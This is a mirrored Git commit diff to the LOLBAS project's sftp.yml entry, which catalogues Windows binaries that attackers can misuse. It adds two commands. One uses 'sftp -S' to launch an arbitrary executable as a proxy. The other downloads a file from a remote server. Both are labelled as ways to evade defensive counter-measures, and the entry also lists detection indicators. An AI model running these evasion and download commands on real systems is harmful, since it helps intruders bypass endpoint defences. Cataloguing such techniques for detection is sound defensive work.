mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-02-26 20:13:42 +01:00
Update sftp.yml
* Added another way of using sftp for execution * Added Download functionality
This commit is contained in:
parent
f3329c0d94
commit
e803bc7635
@ -11,10 +11,25 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
- Command: "sftp -S c:\\windows\\system32\\notepad.exe localhost"
|
||||
Description: Execute notepad.exe with sftp.exe as parent process
|
||||
Usecase: Use sftp.exe as a proxy binary to evade defensive counter-measures
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
- Command: "sftp <ftp_user>@<ftp_Server_ip>:<path_of_file_to_download> <path_to_save_file>"
|
||||
Description: Download file with sftp.exe from an FTP server
|
||||
Usecase: Use sftp.exe as a proxy binary to evade defensive counter-measures. If needed, you will be asked to submit a password for the sFTP session.
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\OpenSSH\sftp.exe
|
||||
Detection:
|
||||
- IOC: sftp.exe spawning unexpected processes
|
||||
- IOC: Suspicious sFTP internet/network traffic
|
||||
Acknowledgement:
|
||||
- Person: 'Nir Chako (Pentera)'
|
||||
Handle: '@C_h4ck_0'
|
||||
|
Loading…
Reference in New Issue
Block a user